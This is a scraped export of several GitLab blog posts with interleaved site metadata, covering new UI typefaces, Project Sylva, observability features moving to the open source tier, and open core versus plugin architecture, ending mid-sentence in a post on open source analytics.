And, in the spirit of transparency, a [GitLab core value](https://handbook.gitlab.com/handbook/values/#transparency), we like to share our rationale for typeface changes. This blog introduces you to the new default typefaces in GitLab – GitLab Sans (Inter) and JetBrains Mono – and explores in detail why we chose them and how they will improve the user experience.\n\n## Introducing GitLab Sans and JetBrains Mono\n\nIn the recent [GitLab rebrand](/blog/devops-is-at-the-center-of-gitlab/), [Inter](https://rsms.me/inter/) was selected as the primary sans-serif typeface and we've adapted it for use in the GitLab user interface (UI) to have more continuity between the brand and product experience. It will be available for users in Release 15.8. Specifically for the UI, we've enabled disambiguation features (increased distinction between some characters) by default. Because of this change, we're including it under the name GitLab Sans in the open source package of GitLab. To complement GitLab Sans with a monospace typeface, we've chosen another open source option: [JetBrains Mono](https://www.jetbrains.com/lp/mono/).\n\nThe GitLab UI has historically relied on system fonts, like San Francisco on macOS and Segoe UI on Microsoft Windows. There are, however, limitations to using these that we'll cover in a moment.\n\n![GitLab Sans (Inter) and JetBrains Mono typefaces](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/gitlab-sans-jetbrainsmono.png){: .center}\nGitLab Sans (Inter) and JetBrains Mono sample\n{: .note.text-center}\n\n## Why the change?\n\nSo we've already mentioned brand continuity as a driving reason for the change, but let's step back a bit. During the rebrand process, Inter was one of many typefaces considered because it was open source and designed for UI. Choosing a font primarily designed for digital output might seem like an odd choice for branding and print application, but the primary extension and experience is the product itself. 
GitLab is digital-first, and the brand reflects it. Inter had all of the qualities and features we knew we could leverage to enhance and realize our vision for the UI.\n\nWe realize there's a lot of subjectivity wrapped up in a change like this. Visual updates are, well, highly visible, but we believe they have to be rooted in objective considerations that lead to adding real value, so here are a few other aspects we evaluated and will cover in greater detail:\n\n- **Less is more** - How can we limit certain choices in ways that enable more meaningful ones?\n- **Consistency** - Can we create more harmony within a single view, streamline the experience across platforms, and reinforce the brand?\n- **Enhance the content** - Can content be more readable, discernable, and generally consumable?\n\n### Less is more\n\nTypography is a crucial part of the GitLab UI, if not _the_ most crucial part. As we continue to refine and beautify the experience, it's apparent that more control over the typography would yield a better experience not only for our users, but also the ones creating the experiences — our internal product, design, and development teams. System fonts have led to everything from false positive bug reports to visual regression errors on both sides. More choice — especially when systems are choosing — doesn't always lead to better experiences.\n\nWith multiple system fonts in play, we choose compromises, not enhancements. For example, asking what alignment works best for _most_ system fonts in a button instead of what alignment works best for _this_ font. Or, what weight should we use when not all system fonts have the same available options instead of what weight creates the right hierarchy for this content. 
With fewer typeface options we have more ability to make meaningful decisions about disambiguation, visual weight, language support, hierarchy, type scales, and so much more.\n\n### Consistency\n\nAn experience has multiple facets: a single view or screen, a flow between multiple views, a transition from reading to editing, or a switch from settings to documentation. Consistency should happen not only within each of these, but also across them. Consistency in a single view means hierarchy, balance, and harmony. In a flow, consistency establishes patterns and understanding. When contexts change, consistency brings familiarity and enhances trust. Typography is an important aspect of all of these.\n\nInconsistencies add up and lead to design, tech, and experience debt. There are known consistency problems with system fonts, for example, in Firefox on macOS, San Francisco has tighter letter spacing than on Chrome or Safari. This leads to different experiences across browsers, and this is just for one system font.\n\n![Comparing system fonts to show varied x-height](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/compare-x-height.png){: .center}\nVaried x-heights of system fonts\n{: .note.text-center}\n\nOptically, system fonts are noticeably different in size. However, the difference is more visible when you compare the length of each due to character width, weight, and kerning (the space between characters). This impacts everything from truncation and component width, to wrapping and legibility.\n\n![Comparing system fonts to show varied width](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/compare-width.png){: .center}\nVaried width of system fonts\n{: .note.text-center}\n\nMenlo has been used as our monospaced typeface. It appears bigger than many sans-serif typefaces when using the same font size. To counter that issue, we had downscaled its size by one pixel to make it appear as the same optical size. 
This added unnecessary bloat to styles and is also not foolproof since sans-serif system fonts also vary.\n\nInter and JetBrains Mono have nearly identical x-height, which allows us to remove all of the downscaling overrides and more generally handle text styles consistently. While both typefaces have specific use cases, they’re almost always present next to each other in the UI, making cohesiveness that much more important.\n\n![GitLab Sans (Inter) and JetBrains Mono x-height comparison](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/gitlab-sans-jetbrainsmono-x-height.png){: .center}\nGitLab Sans and JetBrains Mono with similar x-height\n{: .note.text-center}\n\nBy reducing our typeface options, we're working towards consistency in so many ways we haven't before, everything from brand to product, product to documentation, and browser to browser. Consistency is not the same as uniformity though, and nor should it inhibit preference, but by creating a baseline those things can have room for more thoughtful approaches in the future too.\n\n### Enhance the content\n\nAs mentioned earlier, typography is a crucial part of the UI, and arguably most of the content is in text form. Whether communication or code, status or state, the typeface is the delivery vehicle for the content. GitLab Sans and JetBrains Mono give us better control over readability.\n\nBoth typefaces include variable webfont and contextual features, which means that the font weight and other settings can be finely tuned to enhance visual weight, hierarchy, and contextual alternates. For GitLab Sans, we've enabled the disambiguation feature set to ensure readability is a top priority. Disambiguation is used to avoid common character confusion. For example, by using the feature set [cv05](https://rsms.me/inter/lab/?feat-cv05=1) (lowercase L with tail for disambiguation), you can easily distinguish between the capital “I” and the lowercase “L” (see image below). 
We had discussed using either [ss04](https://rsms.me/inter/lab/?feat-ss04=1) (disambiguation without slash zero) or cv05 and decided to go with the latter for a simple, modern look.\n\n![Inter Typeface character disambiguation](https://about.gitlab.com/images/blogimages/introducing-new-typefaces/inter-disambiguation.png){: .center}\nInter disambiguation options from left to right: Default, without slashed zero (ss04), lowercase L with tail (cv05)\n{: .note.text-center}\n\nGitLab uses a condensed UI, meaning more content in less space and typically at smaller sizes. Inter is popular for a reason, more likely dozens, but the most applicable to GitLab is that it’s designed specifically for UI. On the [website](https://rsms.me/inter/) it states, “Inter is a typeface carefully crafted & designed for computer screens.” With a tall x-height, contextual alternates, tabular numbers, and more, Inter enables us to actually make more meaningful typography decisions that impact readability.\n\nSimilarly, JetBrains Mono has a tall x-height, which increases readability at smaller sizes, and it has a normal character width to keep more characters on a single line which limits wrapping. During our exploration, we found that typefaces like Menlo, Fira Code, Source Code, or Noto Sans Mono either have shorter x-heights or wider characters that lead to size or spacing compromises.\n\nWith these typefaces in place we've started a deep dive into our type scales and updating design resources in Figma too. The upcoming work on type scales, in particular, will provide more consistency and refinement.\n\n## Other considerations\n\nGitLab is an [open core](/blog/gitlab-is-open-core-github-is-closed-source/) product, which means the core of our product is open source, so selecting typefaces that are also open source was a crucial part of the decision. \n\nAnytime you opt to distribute your own resources versus using what's already available to the system the question of performance comes up. 
And while it's true that we're increasing the payload by a few kilobytes, we're able to rely on modern CSS and browser handling for delivery and caching. At the same time, we're reducing the CSS by removing styles that have been added to counter aforementioned compromises. This is something we'll continue to evaluate and optimize.\n\nAnd speaking of distribution, we're [packaging the fonts](https://www.npmjs.com/package/@gitlab/fonts) to make it easier for all of our properties to consume. This means we're also able to leverage the same resources in our design tooling.\n\nLastly, we know that changes like this have the benefit (or downside, depending on how you look at it) of exposing other inconsistencies in the UI that need to be addressed. While it seems counterintuitive to release an update that potentially introduces visual regression, we consider it as the dye in the water to let us know what else we have to fix as we continue to work towards a single source of truth for typography styles.\n\n## What's next?\n\nAs the typography changes are being rolled out, we’re working through feedback and addressing any potential regressions. Along with type scale updates, we're going to evaluate headings throughout the product to ensure heading levels align with correct Document Object Model (DOM) structure, visual weight, and styles. In short, our typography decisions are interdependent and foundational for the overall experience. By limiting typeface options, we’re removing the limits of how hard we can make typography work so that we can further refine the interface, bring harmony to the UI, and make content more consumable so that using GitLab is more productive and enjoyable. 
\n\nIf you’d like to provide feedback or contribute, please use this [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/386205).\n",[4141,1376,9,1495,4142,730],"design","UI",{"slug":4144,"featured":6,"template":689},"new-typefaces-in-gitlab","content:en-us:blog:new-typefaces-in-gitlab.yml","New Typefaces In Gitlab","en-us/blog/new-typefaces-in-gitlab.yml","en-us/blog/new-typefaces-in-gitlab",{"_path":4150,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4151,"content":4157,"config":4162,"_id":4164,"_type":14,"title":4165,"_source":16,"_file":4166,"_stem":4167,"_extension":19},"/en-us/blog/next-gen-telecom-with-gitlab",{"title":4152,"description":4153,"ogTitle":4152,"ogDescription":4153,"noIndex":6,"ogImage":4154,"ogUrl":4155,"ogSiteName":673,"ogType":674,"canonicalUrls":4155,"schema":4156},"Developing next-generation telecommunications with GitLab","Learn more about Project Sylva, a cross-industry collaboration to build a cloud-native, open source telecommunications platform using GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682864/Blog/Hero%20Images/telecomabstract.jpg","https://about.gitlab.com/blog/next-gen-telecom-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Developing next-generation telecommunications with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan Behrenshausen\"}],\n        \"datePublished\": \"2023-08-07\",\n      }",{"title":4152,"description":4153,"authors":4158,"heroImage":4154,"date":4159,"body":4160,"category":10,"tags":4161},[2909],"2023-08-07","\nIn November 2022, the Linux Foundation Europe [announced the launch of Project Sylva](https://www.linuxfoundation.org/press/linux-foundation-europe-announces-project-sylva-to-create-open-source-telco-cloud-software-framework-to-complement-open-networking-momentum), a cloud-native, [open source](https://go.gitlab.com/spHNym) 
telecommunications software stack. The initiative represents a cross-industry collaboration between major telecommunications providers and vendors (Telefonica, Telecom Italia, Orange, Vodafone, Deutsche Telekom, Ericsson, and Nokia), who formally agreed to collaborate on building the foundation of a next-generation telecommunications system in the open.\n\nToday that work continues [on GitLab](https://gitlab.com/sylva-projects), where the project is gaining momentum as its contributor community grows. Eager to hear what that community has achieved since last year, I sat down with [André Vieira](https://gitlab.com/andre.macedo.av), the project's communications lead. \n\nWatch our interview to learn more about Sylva's guiding mission and vision, its successes, its challenges, and its future.\n\n## Watch the interview\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/mblgJpmvkZI\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n",[9,267,1099],{"slug":4163,"featured":6,"template":689},"next-gen-telecom-with-gitlab","content:en-us:blog:next-gen-telecom-with-gitlab.yml","Next Gen Telecom With Gitlab","en-us/blog/next-gen-telecom-with-gitlab.yml","en-us/blog/next-gen-telecom-with-gitlab",{"_path":4169,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4170,"content":4175,"config":4181,"_id":4183,"_type":14,"title":4184,"_source":16,"_file":4185,"_stem":4186,"_extension":19},"/en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development",{"title":4171,"description":4172,"ogTitle":4171,"ogDescription":4172,"noIndex":6,"ogImage":671,"ogUrl":4173,"ogSiteName":673,"ogType":674,"canonicalUrls":4173,"schema":4174},"Observability's role in cloud-native app development","Want better visibility into the entire software development lifecycle across environments? 
Learn how observability can help.","https://about.gitlab.com/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Observability is key to cloud-native transitions and modern application development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-04-05\",\n      }",{"title":4176,"description":4172,"authors":4177,"heroImage":671,"date":4178,"body":4179,"category":682,"tags":4180},"Observability is key to cloud-native transitions and modern application development",[862],"2022-04-05","\n\n_This blog post and linked pages contain information related to upcoming products, features, and functionality. It is important to note that the information presented is for informational purposes only. Please do not rely on this information for purchasing or planning purposes._\n\nModern application development requires DevOps teams to be able to collaborate and react to what is happening across the software development lifecycle. Yet, as companies move away from monolithic code bases resident on a server or cluster of virtual machines to cloud-native environments, this goal becomes more difficult to achieve. Cloud-native architectures are more complex with more elements to configure, protect, execute, and measure. To ensure maximum visibility and responsiveness to issues early on in application development and throughout the lifecycle, companies are adopting observability.\n\n## Observability defined\n\nObservability, which [451 Research](https://451research.com/) defines as the collection and analysis of data logs, metrics, and traces, becomes critical and essential with cloud-native technologies and acts as a step beyond monitoring. 
“The need for such an approach has been brought to the fore by complex, distributed microservices-based applications where the variables are so numerous that it can be impossible to know exactly what metrics need to be collected for the gamut of potential events that could arise,” 451 Research’s “Voice of the Enterprise: DevOps, Organizational Dynamics - Advisory Report” states.\n\n“A need to know what is happening with infrastructure and applications, particularly across hybrid and multi-cloud infrastructure, has driven broad adoption of observability,” according to the report.\n\n## How observability improves cloud-native tech adoption\n\nMore than half of organizations surveyed by 451 Research report either full adoption or some adoption at the team level of cloud-native technologies such as containers, Kubernetes, service mesh, and serverless computing. Another quarter to one-third of respondents plans to deploy cloud-native technologies.\n\nThe challenge is visibility across this new, more complex architecture. While cloud-native technologies offer more flexibility and cost efficiencies for computing resources, they can make it difficult to gain end-to-end visibility of software vulnerabilities, application performance, and quality assessments, and to be able to know where and how to affect change early on in the development lifecycle.\n\nDevOps improvements such as security and analytics are driving the adoption of observability, as is the increased need for compliance. With observability, according to 451 Research’s report, “one can query the data they have and ask any number of questions about a system, and, ideally, get an answer without having to predefine the exact data collected or tagging applied to answer the question.”\n\nIn other words, observability can provide a more flexible toolkit and enable a more active drill-down into what’s actually happening in the development lifecycle. 
With properly implemented observability, DevOps teams can, in real-time, identify a problem, fix it, benchmark the improvement, and measure it going forward – even in a cloud-native environment that is abstracted from knowledge of underlying systems. Having the ability to observe and measure your end-to-end DevOps efforts can reduce risk and provide greater control of cloud-native environments. \n\nDigital transformation leaders and laggards alike understand the need for observability. Nearly two-thirds of all respondents say they have adopted observability (41%) or have it in discovery/proof of concept (23%). Nearly a third plan to implement it within 12 to 24 months.\n\n“While it is great to see these adoption rates, the ultimate goal is to evolve observability’s inputs into actionable insights that positively impact the business,” says Sebastien Pahl, principal product manager at GitLab and co-founder of observability start-up OpsTrace (which was [acquired by GitLab in 2021](/press/releases/2021-12-14-gitlab-acquires-opstrace-to-expand-its-devops-platform-with-open-source-observability-solution.html)).\n\n## The benefits of observability\n\nIn modern application development, dev, sec, and ops teams share the responsibility of software development and delivery. In mature organizations, DevOps can extend to include stakeholders from compliance, legal, finance, and other departments with a direct stake in value delivery. Observability provides DevOps teams greater flexibility in how to utilize and share data across an organization.\n\nPahl likens observability to a flight crew being able to see, learn from, and react to all the data from instruments and dashboards on a plane as it is flying. 
“With observability, everyone can look at the same data through a different lens,” he says.\n\nObservability has significant benefits, including the following:\n\n- Developers can add code early in the development lifecycle for events they want to observe.\n\n- DevOps teams can move faster because they know when something is wrong and exactly what is wrong. They can fix problems once and move on.\n\n- Organizations can detect problems before customers do.\n\n- DevOps teams can assign certain alerts to specific individuals or teams so ops teams won’t be burned out responding to general alerts.\n\n- The inputs and metrics written through observability lay the foundation for AI and machine learning.\n\n## Observability and the DevOps Platform\n\nGitLab believes that [observability is foundational](https://opstrace.com/blog/gitlabobsvervabilityui) to a DevOps platform, and will make the capability available to all GitLab users. [Our vision](/direction/monitor/) is to make every GitLab project observable by default, with features that are easy to operate without specialized, expert skills. Teams can connect the dots between every deployment, incident, and other noteworthy events using and collaborating with telemetry data, which ultimately decreases the frequency and severity of production issues.\n\nGitLab’s observability capability is completely open-sourced and relies on open APIs such as Prometheus and OpenTelemetry so users don’t have to worry about vendor lock-in from instrumentation to alerting. 
It’s built into the GitLab DevOps platform to help you use the capability right away within your native workflow.\n\nLearn more about [observability and the DevOps Platform](https://about.gitlab.com/).\n\n\n\n\n\n\n\n",[685,845,9,1099],{"slug":4182,"featured":6,"template":689},"observability-is-key-to-cloud-native-transitions-and-modern-application-development","content:en-us:blog:observability-is-key-to-cloud-native-transitions-and-modern-application-development.yml","Observability Is Key To Cloud Native Transitions And Modern Application Development","en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development.yml","en-us/blog/observability-is-key-to-cloud-native-transitions-and-modern-application-development",{"_path":4188,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4189,"content":4195,"config":4200,"_id":4202,"_type":14,"title":4203,"_source":16,"_file":4204,"_stem":4205,"_extension":19},"/en-us/blog/observability",{"title":4190,"description":4191,"ogTitle":4190,"ogDescription":4191,"noIndex":6,"ogImage":4192,"ogUrl":4193,"ogSiteName":673,"ogType":674,"canonicalUrls":4193,"schema":4194},"We're moving our observability suite to Core","Our gift to you for 2020: Metrics, logging, and tracing and alerting are coming soon to Core!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665651/Blog/Hero%20Images/gitlab-holiday-2019-blog-cover.png","https://about.gitlab.com/blog/observability","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're moving our observability suite to Core\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-12-16\",\n      }",{"title":4190,"description":4191,"authors":4196,"heroImage":4192,"date":4197,"body":4198,"category":10,"tags":4199},[927],"2019-12-16","\nHappy New Year to our developer community! 
We're moving a big portion of our [observability features](/blog/monitoring-team-update/) – custom metrics, logging, tracing and alerting – from our proprietary codebase to our open source codebase in 2020. We aim to complete this migration by early next year, and [you can follow along with our progress in this Epic](https://gitlab.com/groups/gitlab-org/-/epics/2310). While we're giving you the gift of 20/20 vision into your production environment as a thank you for all you've contributed, there are also three practical reasons as to why we're moving our observability suite to Core.\n\n## Why we're moving observability to Core\n\n### It's part of our stewardship model\n\nThe first reason being that it is our [stewardship](/company/stewardship/) mandate. Our product is open-core and our pricing model is transparent and buyer-based. A [buyer-based pricing model](/company/pricing/#the-likely-type-of-buyer-determines-what-features-go-in-what-tier) means we try to think about what type of buyer is going to get the most value out of a feature as we determine whether a feature belongs in our open source Core product or our paid versions of GitLab.\n\n\"If it's a feature for a single developer who might be working on his or her own individual project, we want that to be in Core because it invites more usage of those tools and we get great feedback in the form of new feature requests and developer contributions,\" says [Kenny Johnston](https://about.gitlab.com/company/team/#kencjohnston), director of product, [Ops](/direction/ops/) at GitLab. 
\"It's an important part of our product philosophy to ensure we keep developer focused features in our Core product.\"\n\n### Observability belongs in Core\n\nOur mission is to provide an end-to-end DevOps solution for developers that is also open source, and we were falling a bit short on the Ops side of things by keeping essential observability tools in a proprietary codebase.\n\n\"Before this move, if you were using GitLab's open source version, you could attach a Kubernetes cluster and deploy applications to it, but then your ability to observe how your users are interacting with it in production was limited,\" says Kenny. \"Now, you can get out-of-the-box metrics, create customized ones, get access to log tailing and searching and see traces – all within GitLab. Those were all non-existent in Core previously.\"\n\nThe fact is, the three pillars of observability: [custom metrics](/direction/monitor/platform-insights/), [logging](/direction/monitor/#logging), and [tracing and alerting](/direction/monitor/platform-insights/), are fundamental to the complete DevOps lifecycle even for those single developers working on their own projects. That means they belong in our Core product.\n\n### We want your input on monitoring\n\nThe third reason is that we value your contributions, and we're hoping that by making our observability tools open source you will make valuable improvements to the code so that other developers can benefit from your insight. This is the gift you offer us every day, and so now we have a wishlist for you.\n\n## The three pillars of observability are on our wish list\n\n### Custom metrics\n\nGitLab has a strong integration with Prometheus that allows users like you to [monitor key metrics for applications](/direction/monitor/platform-insights/) deployed on Kubernetes or a different [Prometheus server](https://docs.gitlab.com/ee/user/project/integrations/prometheus.html#manual-configuration-of-prometheus), without ever leaving our interface. 
Common reporting metrics include system metrics such as memory consumption, as well as error and latency rates. GitLab will automatically detect certain metrics from our metrics library, and you can customize these metrics based on your needs.\n\nBut there is always room for improvement. If you see something that you think needs improvement with metrics, or any of our observability features, please submit an issue or a merge request, or even contribute changes to our open source codebase.\n\n### Logging\n\nYou can see [logs of running pods on your Kubernetes clusters](https://docs.gitlab.com/ee/user/clusters/agent/index.html), without the hassle of having to toggle between applications, since logging is integrated within GitLab. But our [current logging capabilities](/direction/monitor/platform-insights/) are best described as log tailing. Users can see what is essentially a live stream of their logs within GitLab. Is our log tailing providing enough observability into the health of your deployed Kubernetes clusters? We're hoping you can help us innovate new ways to make our logging tools more valuable.\n\n\"I would love to have more insight into how users want to interact with [logging], if log tailing is sufficient, how much they want to move back and forth,\" says Kenny. \"Some of those contributions can come in the form of commentary or issues being created, but people could also take it upon themselves to adjust that view so that is better suited to their needs when tailing a log.\"\n\n### Tracing and alerting\n\nWhile there are certain metrics that are commonly reported about a deployed application — such as how much CPU is being consumed, the speed to process a request, etc., [tracing](https://docs.gitlab.com/ee/operations/tracing.html) allows you to monitor deployed applications in more depth and be alerted to any issues with the performance or health of the application. 
But, like logging, our [tracing and alerting capabilities are in the earliest stages](/direction/monitor/platform-insights/).\n\n\"Today, our tracing is fairly minimal,\" says Kenny. \"We have an embedded UI for Jaeger, but we'd love to see contribution from members of the Jaeger community for more deep integration into GitLab. Maybe developers and operators who use GitLab would like to see more of the Jaeger UI experience directly in GitLab.\"\n\nOur alerting capabilities are also a bit clunky. You have to define it directly in the UI and code configuration. By better uniting our tracing integration with Jaeger with our alerting capabilities, we could create a more synchronized user experience.\n\n## Closing the DevOps loop\n\nIn order for GitLab to function as an end-to-end DevOps solution, our users must be able to apply our ticketing system all the way from issue to production.\n\n\"I'm really interested in the use case where people are creating issues for alerting when something goes wrong with their production environments, and then how they interact with observability information in the incident management issue itself,\" explains Kenny.\n\nPerhaps you need an issue template for incidents that will show a particular log line. Or there might be a custom metric that is so commonly used, it ought to be added to our metrics library.\n\n\"If you don't like the way that your alerting is set up, or you don't like the way that your log system is aggregated we'd love your contributions. If you don't like how metric charts, logs or traces are displayed in fire-fighting issues we'd love your contributions. GitLab is open source. You can contribute improvements to your observability tool just like you can the rest of your developer platform,\" says Kenny.\n\nSo go for it!\n\nThe three pillars of observability on GitLab are ripe for iteration, and there is still so much creative potential for each of these tools. 
We look forward to seeing what you come up with in 2020!\n",[9,803],{"slug":4201,"featured":6,"template":689},"observability","content:en-us:blog:observability.yml","Observability","en-us/blog/observability.yml","en-us/blog/observability",{"_path":4207,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4208,"content":4214,"config":4219,"_id":4221,"_type":14,"title":4222,"_source":16,"_file":4223,"_stem":4224,"_extension":19},"/en-us/blog/open-core-is-worse-than-plugins",{"title":4209,"description":4210,"ogTitle":4209,"ogDescription":4210,"noIndex":6,"ogImage":4211,"ogUrl":4212,"ogSiteName":673,"ogType":674,"canonicalUrls":4212,"schema":4213},"Open core is worse than plugins... and that’s why it’s better","Learn why GitLab's decision to opt for the \"worse\" choice has been a great success.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681581/Blog/Hero%20Images/gitlab-linux-ibm-z-redhat-openshift.jpg","https://about.gitlab.com/blog/open-core-is-worse-than-plugins","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open core is worse than plugins... and that’s why it’s better\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2022-07-14\",\n      }",{"title":4209,"description":4210,"authors":4215,"heroImage":4211,"date":4216,"body":4217,"category":682,"tags":4218},[1235],"2022-07-14","\nOpen core is obviously a horrible approach to creating a product with an ecosystem of extensions and integrations: There are no proper protocols and interfaces. Instead, anyone can just add their integration to the code base and even adjust said code base to their needs if it doesn’t fit.\n\nSo why have we been using the “Worse” approach at GitLab for many years now, with great success? Because [Worse is Better](https://www.dreamsongs.com/RiseOfWorseIsBetter.html) (a term conceived by [Richard P. 
Gabriel](https://en.wikipedia.org/wiki/Richard_P._Gabriel)). Of course, it turns out that “Worse” is actually even better than Worse is Better suggested.\n\nGabriel’s [original argument](https://www.dreamsongs.com/RiseOfWorseIsBetter.html) was that (slightly) intrinsically worse but simpler and easier to implement software has better survival characteristics than better-designed, more complex software, and thus will consistently win in the marketplace.\n\nAt GitLab, we have found that this is basically true, which is why we, for example, favor “boring technology,” even if it might not be the best possible solution for a given scenario. But this doesn’t tell the whole story: It turns out that such software is not just more successful, it also ends up being qualitatively better in the end.\n\n## Worse is even better\n\nIt is important to note that Gabriel’s original argument was not that **bad** software wins out. In fact, both his “worse” and his “better” have the same qualities:\n\n1. Simplicity, of interface and implementation\n2. Correctness\n3. Consistency\n4. Completeness\n\nHowever, his “worse” and his “better” have slightly different weights for the value placed on these characteristics, with the (worse) New Jersey school favoring simplicity of implementation over simplicity of interface, whereas the (better) “MIT” school favors simplicity of interface, even at the cost of a more complex implementation.\n\nIf a simple interface can be achieved with a simple implementation, both schools agree, the difference comes when there are tradeoffs to be made.\n\nWhat makes worse even better, and what Gabriel didn’t take into account even in later [versions](https://www.dreamsongs.com/WorseIsBetter.html), is the tremendous value of feedback loops. 
Being early doesn’t just let the New Jersey approach win in the marketplace, it also allows it to collect feedback much, much earlier and much more quickly than the MIT approach.\n\nPaul MacCready won the first [Kremer prize](https://en.wikipedia.org/wiki/Kremer_prize) not by initially setting out to build the best human-powered aircraft, but by building the one that was easiest to repair in order to gather feedback more quickly. While other teams took a year or more to recover from a crash, his plane sometimes flew again the same day. And so it was exactly this willingness to lose sight of the prize that resulted in him winning it.\n\nIn much the same way, it is these quick feedback loops that a “worse” approach enables, started much earlier, that eventually lead to a better product.\n\n## The problem with plugins\n\nAt least since the success of Photoshop, a proper plugin interface has been recognized as _The Right Way_ to make software both more compelling for users and less easy to leave behind by creating a third-party ecosystem that provides useful functionality without the vendor having to provide all of that functionality themselves.\n\nIt was so successful that systems like OpenDoc took the idea further to be just a set of plugins, with no real hosting application. None of these systems succeeded in the marketplace.\n\nOne of the reasons is that good plugin interfaces are not just hard, but downright fiendishly difficult to develop. The basic difficulty is that it is hard to get the balance right: what to expose, what to keep hidden, how to provide functionality. But that’s not the fiendish part.\n\nThe fiendishly difficult part of plugin API development is that the very things you need to do to handle the difficulties make the task even harder: You need to design more carefully, you need to make interfaces stable, you can only iterate them slowly.\n\nIn short: You face a chicken-and-egg problem of premature abstraction. 
In order to make a good plugin API, you need to see it being used, but in order to see how it is being used, you need to first have it. This dynamic delays initial availability and makes feedback cycles slower.\n\nSoftware is not the only domain facing this problem. Parks, for example, often have official paths that don’t match where people actually want to go. One group of landscape architects solved this by doing less: They didn’t put in any walkways in a park they had created. Instead, they waited for trails to materialize as people walked where they needed to walk. Only after those trails had materialized did they pave them, making them official.\n\nLast but not least, a plugin interface means that the final product the user sees, consisting of both the core application and all the plugins, is not as well-integrated as it could be. The value proposition of “here is a box with tools, have fun!” sounds a lot more enticing to developers than it does to end users, even when those tools are, by themselves, best of breed.\n\n## Open core\n\nOpen core, on the other hand, sounds like exactly the wrong approach, certainly from a software engineering point of view, as there are no defined black-box boundaries, but also from a business point of view as there doesn’t seem to be an actual mutually reinforcing ecosystem.\n\nHowever, the open core approach is great for end users, both for adopters who just want to use it and also adapters who need to tailor the system to their use case. And in the end, it is the end users that count.\n\nFor adapters, the system is immediately hackable. There is no need to wait for the vendor to provide a plugin interface in the first place, and no need to wait more for the vendor to make that plugin interface provide the functionality needed for a particular application some time in the future, if ever. 
Even if changes to the core application are required, this is at least possible.\n\nSince there is more adaptation activity happening sooner, the system becomes better at accommodating adaptation needs, and a virtuous cycle ensues.\n\nFor adopters, the benefits are multifold: First, the system gets more functionality more quickly, which is always good. Almost more importantly, this functionality is integrated by the vendor and provided as an integrated whole. There is a reason single-vendor office suites succeeded where OpenDoc’s toolbox approach failed.\n\nThat said, an open core approach does require solid engineering, a good architectural base, and ongoing vigilance. As [explained earlier](https://thenewstack.io/why-were-sticking-with-ruby-on-rails-at-gitlab/), we believe that Ruby on Rails provided us with a good starting point to build GitLab as a solid modular monolith, both approachable and well-structured. With that as a starting point, good design is encouraged by example, rather than being enforced by strict API boundary. 
Enforcement, on the other hand, comes in a more human form as pull requests are considered, shaped, and approved or rejected.\n\nSo boundaries still exist, but instead of being brick walls to crash against, they are low fences that are noticeably present, but can be stepped over if needed.\n\nAnd although these low fences are considered “worse” than the brick walls we are used to, they actually lead to better outcomes for everybody involved.\n",[685,9,267],{"slug":4220,"featured":6,"template":689},"open-core-is-worse-than-plugins","content:en-us:blog:open-core-is-worse-than-plugins.yml","Open Core Is Worse Than Plugins","en-us/blog/open-core-is-worse-than-plugins.yml","en-us/blog/open-core-is-worse-than-plugins",{"_path":4226,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4227,"content":4232,"config":4237,"_id":4239,"_type":14,"title":4240,"_source":16,"_file":4241,"_stem":4242,"_extension":19},"/en-us/blog/open-source-analytics",{"title":4228,"description":4229,"ogTitle":4228,"ogDescription":4229,"noIndex":6,"ogImage":900,"ogUrl":4230,"ogSiteName":673,"ogType":674,"canonicalUrls":4230,"schema":4231},"4 Examples of the power of open source analytics","Our Data and Analytics team manager reflects on how open source and radical transparency has benefited analytics work at GitLab.","https://about.gitlab.com/blog/open-source-analytics","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"4 Examples of the power of open source analytics\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Taylor Murphy\"}],\n        \"datePublished\": \"2019-04-15\",\n      }",{"title":4228,"description":4229,"authors":4233,"heroImage":900,"date":4234,"body":4235,"category":10,"tags":4236},[3753],"2019-04-15","\nOne of the great parts of working for a company with such a strong [open source](/solutions/open-source/) ethos is that\nyou're able to apply this philosophy to other parts of the 
